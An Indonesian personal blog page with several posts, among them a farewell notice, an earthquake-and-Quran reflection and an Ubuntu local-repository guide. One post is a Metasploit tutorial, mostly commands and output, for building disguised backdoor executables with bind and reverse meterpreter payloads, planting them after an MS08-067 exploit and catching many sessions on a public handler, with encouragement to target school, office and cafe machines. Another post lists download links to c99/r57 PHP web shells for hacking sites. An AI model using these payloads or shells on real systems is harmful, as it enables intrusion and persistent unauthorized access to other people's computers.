Chat Shout


visit f3 blog's

Tutup Buku

Diposting oleh fitri-ariyanto Friday, May 21, 2010 AT Friday, May 21, 2010

Maaf sodara-sodara, untuk beberapa saat ini mungkin blog ini tidak update lagi.Mohon maaf mungkin rekan2 kurang nyaman.. terimakasih bagi rekan2 yang bersedua komen2, kasih kritik, saran ide juga.

sementara blog yang dapat update http://usersonly.wordpress.com


salam,
xiNux3r

Selengkapnya

0 COMMENTS Link ke posting ini  

Gempa dan Al Qur'an

Diposting oleh fitri-ariyanto Friday, October 02, 2009 AT Friday, October 02, 2009

Sungguh sangat menyentuh hati jika kita menyimak lebih dalem tentang bencana yg terus menerus melanda negeri ini.Ada baiknya kita mulai belajar dan memahami apa arti di balik semua ini. Ya Allah, berikan kami perlindungan atas segala adzab dan siksa, tuntunlah kami ke Jalan MU ya ALLAH. Jalan yang lurus dan jalan orang-orang yang Allah beri Nikmat. dan bukan jalan orang-orang yang Sesat. Sadarkan kami dan negeri ini ya Allah.

Kejadiannya jam 17.16 wib yahh.. coba deh buka Alquran surat 17 ayat 16
yakni
Al-Isra ayat 16 :"Dan jika Kami hendak membinasakan suatu negeri, maka Kami perintahkan kepada orang-orang yang hidup mewah di negeri itu (supaya mentaati Allah) tetapi mereka melakukan kedurhakaan dalam negeri itu, maka sudah sepantasnya berlaku terhadapnya perkataan (ketentuan Kami), kemudian Kami hancurkan negeri itu sehancur-hancurnya.'

trus kan ada gempa susulan jam 17.38
coba aja liat Al-Isra surat 38:"Semua itu kejahatannya amat dibenci di sisi Tuhanmu."

kalo di Jambi gempanya jam 8.52 wib
nah isi dari surat al-Anfal ayat 52 (QS 8:52) yakni: "(Keadaan mereka) serupa dengan keadaan Firaun dan pengikut-pengikutnya serta orang-orang yang sebelumnya. Mereka mengingkari ayat-ayat Allah, maka Allah menyiksa mereka disebabkan dosa-dosanya. Sesungguhnya Allah Maha Kuat lagi Amat Keras siksaan-Nya."

Allah tried to remind us.......... Subhanallah
semoga dengan pertanda ini kita menjadi muslim yang lebih baik.. aminn

Selengkapnya

1 COMMENTS Label: Link ke posting ini  

Metasploit to backdooring

Diposting oleh fitri-ariyanto Monday, May 11, 2009 AT Monday, May 11, 2009

May already have some of the metasploit that can be used to create a backdoor.
Use of this backdoor is very useful, especially as post-Exploitation method. At the time this example we will use the 2 basic methods to get the shell from the target, namely bind_tcp and reverse_tcp.
To bind_tcp, akan backdoor running on the target terget akan open the port on the system itself. So that after the exploitation process is complete, we can enter at any time to the target by using the port has been opened by the backdoor.


$ ./msfpayload windows/meterpreter/bind_tcp LPORT=4321 RHOST=10.10.96.143 EXITFUNC=thread X > MicrosoftDS.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/bind_tcp
 Length: 307
Options: LPORT=4321,RHOST=10.10.96.143,EXITFUNC=thread


Backdoor will open a port on the 4321 target 10.10.96.143. How is the process running up to our backdoor, backdoor can be planted and executed after the process is complete exploitation of the target as follows:


msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (10.10.97.14:31338 -> 10.10.96.143:4780)

meterpreter > cd \
meterpreter > pwd
C:\
meterpreter > upload MicrosoftDS.exe
[*] uploading  : MicrosoftDS.exe -> MicrosoftDS.exe
[*] uploaded   : MicrosoftDS.exe -> MicrosoftDS.exe
meterpreter > execute -f MicrosoftDS.exe -H
Process 2348 created.


At the next time, we can go to the target machine without doing exploitation back, simply by opening the connection on the port that has been defined next.


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(handler) > set LPORT 4321
LPORT => 4321
msf exploit(handler) > set RHOST 10.10.96.143
RHOST => 10.10.96.143
msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (10.10.97.14:58798 -> 10.10.96.143:4321)

meterpreter >



Second method uses reverse shell, reverse shell is used especially when the target network is limited by the firewall so that it can not open a connection to any port (typical internal network). So if you have the opportunity for hacking to a machine in the internal network (eg: computer school, computer office, computer cafe, etc) and still want to get shell access at any time and anywhere can take advantage of multi-handler to accept metasploit reverse shell. We can setup a multi-handler in the machinery that can be accessed from anywhere on the internet, for example: hosting machine, or server engine results rampokan, etc..


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description 
   ----  ---------------  --------  ----------- 


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description                         
   ----      ---------------  --------  -----------                         
   EXITFUNC  seh              yes       Exit technique: seh, thread, process 
   LHOST                      yes       The local address                   
   LPORT     4444             yes       The local port                       


Exploit target:

   Id  Name           
   --  ----           
   0   Wildcard Target 


msf exploit(handler) > set LPORT 53
LPORT => 53
msf exploit(handler) > set LHOST 222.124.199.76
LHOST => 222.124.199.76
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler..


Then create a backdoor to live with reverse_shell category:


$ ./msfpayload windows/meterpreter/reverse_tcp LPORT=53 LHOST=222.124.199.76 EXITFUNC=thread X > MicrosoftDS.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 278
Options: LPORT=53,LHOST=222.124.199.76,EXITFUNC=thread
$ file MicrosoftDS.exe
MicrosoftDS.exe: MS-DOS executable PE  for MS Windows (GUI) Intel 80386 32-bit


And when the run (run through the post-session exploitation or run manually via double-click the mouse razz), on a multi-handler will appear:


[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (222.124.199.76:53 -> 10.10.96.143:4831)

meterpreter >


Wow, using a multi-handler metasploit is we can have multiple sessions at once, for the above example can be seen a multi-handler that has been set ExitOnSession == false reverse_shell can menghandle many at once. And we can interact with the session-session at any time we want to:


msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Description  Tunnel                             
  --  -----------  ------                             
  3   Meterpreter  222.124.199.76:53 -> 10.10.96.146:4831 
  4   Meterpreter  222.124.199.76:53 -> 10.10.96.223:4836 
  5   Meterpreter  222.124.199.76:53 -> 10.10.96.215:4838 
  6   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4840 
  7   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4845 
  8   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4846 
  9   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4847 

msf exploit(handler) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > sysinfo
Computer: PROGWAR
OS      : Windows XP (Build 2600, ).


That is some of the metasploit for example backdooring, many examples of other creative kiddies, especially the smell and evil-in-mind. Oh yes, in the example above I use the payload meterpreter many times. The discussion about meterpreter akan do next.
-----
thank'to:
echo, xcode, jasakom, mildnet, newhack etc..

copyleft@echo.or.id

Selengkapnya

23 COMMENTS Link ke posting ini  

PHP Shell

Diposting oleh fitri-ariyanto AT Monday, May 11, 2009

Why is it that we have a site that we can hack the remote? Perhaps one of the few activities we can do with exploitation or remote file / server with shell code.
hmm, the following shell code for exploitation that may be used.


http://allplayoffs.com/~willboar/c100.php
-----------
http://asiahardon.com/~willboar/c100.php
-----------
http://ygbai.com/~willboar/c100.php
-----------
http://4-phonecard.com/~willboar/c100.php
-----------
http://afilmase.com/~willboar/c100.php
-----------
http://allplayoffs.com/~willboar/c100.php
-----------
http://asiahardon.com/~willboar/c100.php
-----------
http://afilmase.com/~willboar/c100.php
-----------
http://ygbai.com/~willboar/c100.php
-----------
http://4-phonecard.com/~willboar/c100.php
-----------
http://xxxwebreview.com/~willboar/c100.php
-----------
http://www.shellc0der.com/c100.txt
-----------
http://www.shellc0der.com/c99.txt
-----------
http://www.shellc0der.com/r57.txt
-----------
http://www.shellc0der.com/r58.txt
-----------
http://www.shellc0der.com/phpshell.txt
-----------
http://www.shellc0der.com/c99v2.txt

Selengkapnya

0 COMMENTS Label: Link ke posting ini  

Membuat Repository lokal Ubuntu Linux

Diposting oleh fitri-ariyanto Tuesday, February 03, 2009 AT Tuesday, February 03, 2009

Anda pengguna Ubuntu Linux? paket-paket default yang hadir bersama CD instalasi terasa sangat kurang terutama jika anda ingin melakukan banyak hal misalnya mendengarkanMP3, memutar movie berformat avi dan mengekstrak file berekstensi .rar. Jika anda punya koneksi Internet bagus dan murah…ini bukan masalah. Segala kekurangan dapat diupdate secara otomatis oleh Ubuntu…menghubungkan desktop anda ke server repository ubuntu di Internet.

Ubuntu 8.04 seperti yang saya gunakan mempunyai 5 DVD (sekitar 20 GB) repository yang dapat dikatakan lengkap. Mau apa pun hampir 100 % ada..hampir lho. Update MP3 player? bisa..mau instal tool untuk programming? bisa…tinggal pilih bahasa dan tool apa yang anda mau? Java, C++ (ini mah umum banget), Visual Basic (GAMBAS), Delphi (Lazarus), Pascal (Free Pascal)…semua ada.

Jika anda nggak punya koneksi bagus dan murah ke Internet…anda dapat membuat server repo lokal. Bagusnya sih..lab di Kampus punya server ini dan setiap client dapat mengaksesnya. Langkah-langkah di bawah ini ditujukan untuk membuat repository lokal dari file ISO 5 DVD Ubuntu 8.04 …jadi ISO tersebut tidak perlu di burn ke DVD-ROM. Kalo mau dibuat sebagai server…taruh ajah di direktori file-file web server atau FTP server:


Melalui Synaptic Package Manager:
1. Buka menu: System > Administration > Software Resouces
2. Pilih tab “Third-Party Software”
3. Pilih “Add”
4. Masukkan baris pertama pada salah satu server repositori pada daftar di atas. Misalnya:
deb http://mugos.ums.ac.id/pub/ubuntu hardy main restricted universe multiverse
6. Klik “Add” lagi, lalu isikan baris berikutnya. Lakukan langkah ini hingga semua baris pada server tersebut selesai anda masukkan.
7. Setelah selesai, centang setiap item pada daftar “Third-Party Software”
8. Klik “Close”
9. Klik “Reload” pada ikon di sebelah kiri atas

Melalui terminal:
1. Masukkan perintah berikut:
sudo gedit /etc/apt/sources.list

2. Hapus seluruh baris pada file ini dan ganti dengan baris-baris pada salah satu server dari daftar di atas. Contoh:
deb http://mugos.ums.ac.id/pub/ubuntu Hardy main multiverse restricted universe
deb http://mugos.ums.ac.id/pub/ubuntu Hardy-security main multiverse restricted universe
deb http://mugos.ums.ac.id/pub/ubuntu Hardy-updates main multiverse restricted universe

3. Melalui terminal, masukkan perintah berikut:
sudo apt-get update

berikut ini alamat server tersebut :

UMS
deb http://mugos.ums.ac.id/pub/ubuntu/ hardy main restricted universe multiverse
deb http://mugos.ums.ac.id/pub/ubuntu/ hardy-updates main restricted universe multiverse
deb http://mugos.ums.ac.id/pub/ubuntu/ hardy-security main restricted universe multiverse

ITS
deb http://mirror.its.ac.id/ubuntu hardy main multiverse restricted universe
deb http://mirror.its.ac.id/ubuntu hardy-security main multiverse restricted universe
deb http://mirror.its.ac.id/ubuntu hardy-backports main multiverse restricted universe
deb http://mirror.its.ac.id/ubuntu hardy-updates main multiverse restricted universe

Kambing
deb http://kambing.ui.edu/ubuntu hardy main restricted universe multiverse
deb http://kambing.ui.edu/ubuntu hardy-updates main restricted universe multiverse
deb http://kambing.ui.edu/ubuntu hardy-security main restricted universe multiverse
deb http://kambing.ui.edu/ubuntu hardy-backports main restricted universe multiverse
deb http://kambing.ui.edu/ubuntu hardy-proposed main restricted universe multiverse

mirror.cbn.net.id (OpenIXP)
deb http://ubuntu.cbn.net.id/Ubuntu hardy main restricted universe multiverse
deb http://ubuntu.cbn.net.id/Ubuntu hardy-updates main restricted universe multiverse
deb http://ubuntu.cbn.net.id/Ubuntu hardy-security main restricted universe multiverse
deb http://ubuntu.cbn.net.id/Ubuntu hardy-backports main restricted universe multiverse
deb http://ubuntu.cbn.net.id/Ubuntu hardy-proposed main restricted universe multiverse

komo.vlsm.org
deb http://komo.vlsm.org/ubuntu hardy main restricted universe multiverse
deb http://komo.vlsm.org/ubuntu hardy-updates main restricted universe multiverse
deb http://komo.vlsm.org/ubuntu hardy-security main restricted universe multiverse
deb http://komo.vlsm.org/ubuntu hardy-backports main restricted universe multiverse
deb http://komo.vlsm.org/ubuntu hardy-proposed main restricted universe multiverse

ITB
deb ftp://ftp.itb.ac.id/pub/ubuntu hardy main restricted universe multiverse
deb ftp://ftp.itb.ac.id/pub/ubuntu hardy-updates main restricted universe multiverse
deb ftp://ftp.itb.ac.id/pub/ubuntu hardy-security main restricted universe multiverse
deb ftp://ftp.itb.ac.id/pub/ubuntu hardy-backports main restricted universe multiverse
deb ftp://ftp.itb.ac.id/pub/ubuntu hardy-proposed main restricted universe multiverse

FOSS
deb http://dl2.foss-id.web.id/ubuntu hardy main restricted universe multiverse
deb http://dl2.foss-id.web.id/ubuntu hardy-updates main restricted universe multiverse
deb http://dl2.foss-id.web.id/ubuntu hardy-security main restricted universe multiverse
deb http://dl2.foss-id.web.id/ubuntu hardy-backports main restricted universe multiverse
deb http://dl2.foss-id.web.id/ubuntu hardy-proposed main restricted universe multiverse

mirror.unej.ac.id
deb http://mirror.unej.ac.id/ubuntu hardy main restricted universe multiverse
deb http://mirror.unej.ac.id/ubuntu hardy-updates main restricted universe multiverse
deb http://mirror.unej.ac.id/ubuntu hardy-security main restricted universe multiverse
deb http://mirror.unej.ac.id/ubuntu hardy-backports main restricted universe multiverse
deb http://mirror.unej.ac.id/ubuntu hardy-proposed main restricted universe multiverse

------------------
Referensi:
http://solo.foss-id.web.id/
http://komputasi.wordpress.com/

Selengkapnya

2 COMMENTS Label: Link ke posting ini  

Subscribe to: Posts (Atom)